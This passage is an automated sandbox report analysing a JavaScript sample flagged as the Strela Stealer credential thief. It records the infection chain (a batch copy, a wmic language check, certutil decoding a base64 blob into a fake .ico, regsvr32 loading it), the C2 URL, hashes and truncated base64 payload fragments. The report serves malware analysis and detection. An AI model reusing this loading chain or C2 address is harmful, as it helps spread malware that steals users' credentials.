Source: C:\Windows\System32\certutil.exe

File created: C:\Users\user\muddledfreedesert.ico

Jump to dropped file

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1396			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1932			Jump to behavior

Source: C:\Windows\System32\regsvr32.exe

API coverage: 4.5 %

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6500	Thread sleep count: 1396 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6500	Thread sleep count: 1932 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5040	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: astonishinglewdselective.1.dr

Binary or memory string: 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

Source: C:\Windows\System32\wbem\WMIC.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\regsvr32.exe

Code function: 8_2_00007FFE102314B0 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,

8_2_00007FFE102314B0

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /k copy "C:\Users\user\Desktop\1239840531439025921.js" "C:\Users\user\\mindtrembleopen.bat" && "C:\Users\user\\mindtrembleopen.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_operatingsystem get oslanguage	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /i "1033"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /V flyutopianobedient ""C:\Users\user\\mindtrembleopen.bat""	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -decode astonishinglewdselective muddledfreedesert.ico	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell regsvr32 muddledfreedesert.ico	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\regsvr32.exe "C:\Windows\system32\regsvr32.exe" muddledfreedesert.ico	Jump to behavior

Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Strela Stealer

Source: Yara match	File source: 8.2.regsvr32.exe.7ffe1023e734.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.regsvr32.exe.7ffe1023e734.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.regsvr32.exe.7ffe10230000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.1707250298.00007FFE1023E000.00000004.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1707173156.0000000002481000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 6372, type: MEMORYSTR

Remote Access Functionality

Yara detected Strela Stealer

Source: Yara match	File source: 8.2.regsvr32.exe.7ffe1023e734.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.regsvr32.exe.7ffe1023e734.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.regsvr32.exe.7ffe10230000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.1707250298.00007FFE1023E000.00000004.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1707173156.0000000002481000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 6372, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	221 Scripting	Valid Accounts	1 Native API	221 Scripting	11 Process Injection	121 Masquerading	OS Credential Dumping	1 Security Software Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Exploitation for Client Execution	1 DLL Side-Loading	1 DLL Side-Loading	21 Virtualization/Sandbox Evasion	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	1 Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	Logon Script (Windows)	11 Process Injection	Security Account Manager	21 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Steganography	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Obfuscated Files or Information	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	12 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
1239840531439025921.js	35%	Virustotal		Browse

Source	Detection	Scanner	Label	Link
45.9.74.12/server.php	100%	Avira URL Cloud	malware
45.9.74.12/server.php	12%	Virustotal		Browse

Name	Malicious	Antivirus Detection	Reputation
45.9.74.12/server.php	true	12%, Virustotal, Browse Avira URL Cloud: malware	low

World Map of Contacted IPs

⊘No contacted IP infos

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1417023
Start date and time:	2024-03-28 14:24:36 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 26s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Without Instrumentation
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	1239840531439025921.js
Detection:	MAL
Classification:	mal100.troj.expl.evad.winJS@16/7@0/0
EGA Information:	Successful, ratio: 100%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .js

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
14:25:23	API Interceptor	1x Sleep call for process: WMIC.exe modified

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.7307872139132228
Encrypted:	false
SSDEEP:	3:Nlllul4/X:NllU4/
MD5:	3C34689C4BD27F7A51A67BBD54FA65C2
SHA1:	E444E6B6E24D2FE2ACE5A5A7D96A6142C2368735
SHA-256:	4B7DAB4629E6B8CC1CD6E404CB5FC110296C3D0F4E3FDBBDB0C1CE48B5B8A546
SHA-512:	02827A36A507539C617DFE05EDF5367EB295EB80172794D83F3E9AF612125B7CA88218C2601DFA8E0E98888061A0C7B0E78428188523FA915F39B23F148F8766
Malicious:	false
Reputation:	low
Preview:	@...e.................................,.........................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lnffw4rs.104.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qjllnkuc.i0s.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\astonishinglewdselective

Download File

Process:	C:\Windows\System32\cmd.exe
File Type:	ASCII text, with very long lines (3027), with CRLF line terminators
Category:	modified
Size (bytes):	290664
Entropy (8bit):	5.637755217120682
Encrypted:	false
SSDEEP:	6144:zBHEsQEhu1bTtA/ZilnqbLJGpjEmWjuFx:z99dSbTIiY/JGGC
MD5:	02A91D04B7C12212CEF7181F6AD25C82
SHA1:	E598C56B78EA8F4A80B30833458F172050372CE0
SHA-256:	6D6DD14E9293134892EB0179CAAF0F8FDF6B6D4A4655959A462D8222CDB9EB6A
SHA-512:	9206857018E71B325F4DF979683899F223F3F7EACDF369315639EB8075E259E8BDAE54B247F4468D7F7B6E1675014395A2A366AA2E4FB6781A0DDB57CF3CEB68
Malicious:	false
Preview:	TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAAZIYTACKwBGYA6AIApwQAAPAAJiALAgIpALAAAADGAgAAAgAAkhIAAAAQAAAAAEz8AgAAAAAQAAAAAgAABAAAAAAAAAAFAAIAAAAAAADAAwAABgAAmTMEAAMAYAEAACAAAAAAAAAQAAAAAAAAAAAQAAAAAAAAEAAAAAAAAAAAAAAQAAAAAAADAEwAAAAAEAMAsAgAAAAAAAAAAAAAANACAKACAAAAAAAAAAAAAABAAwB4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYLACACgAAAAAAAAAAAAAAAAAAAAAAAAAWBIDAKABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAudGV4dAAAABiuAAAAEAAAALAAAAAGAAAAAAAAAAAAAAAAAABgAABgLmRhdGEAAABg7gEAAMAAAADwAQAAtgAAAAAAAAAAAAAAAAAAQAAAwC5yZGF0YQAAEAkAAACwAgAACgAAAKYCAAAAAAAAAAAAAAAAAEAAAEAvNAAAAAAAAAQAAAAAwAIAAAIAAACwAgAAAAAAAAAAAAAAAABAAADALnBkYXRhAACgAgAAANACAAAEAAAAsgIAAAAAAAAAAAAAAAAAQAAAQC54ZGF0YQAAjAIAAADgAgAABAAAALYCAAAAAAAAAAAAAAAAAEAAAEAuYnNzAAAAAGABAAAA8AIAAAAAAAAAAAAAAAAAAAAAAAAAAACAAADALmVkYXRhAABMAAAAAAADAAACAAAAugIAAAAAAAAAAAAAAAAAQAAAQC5pZGF0YQAAsAgAAAAQAwAACgAAALwCAAAAAAAAAAAAAAAAAEAA

C:\Users\user\mindtrembleopen.bat

Download File

Process:	C:\Windows\System32\cmd.exe
File Type:	ASCII text, with very long lines (3027), with CRLF line terminators
Category:	dropped
Size (bytes):	318926
Entropy (8bit):	5.7782767634703776
Encrypted:	false
SSDEEP:	6144:eBHEsQEhu1bTtA/ZilnqbLJGpjEmWjuFnrPU+r:e99dSbTIiY/JGGuPt
MD5:	F06BB1A7DF51DF32D783B34F92D9B66A
SHA1:	B687119329CE2407964F5230BAF368D76073A8E1
SHA-256:	84E1EDD28A73544499787540829363608648E12C3F3F2955AB2FB3B1AF1D1E05
SHA-512:	A43A1C6B1EF84E1A833DC065D787D8482DFB8539A504752DE71386AADF788E936943E1A4D37AD24C8EF1A57791AAF99E252928C1BB7C32CC41836AF419286003
Malicious:	true
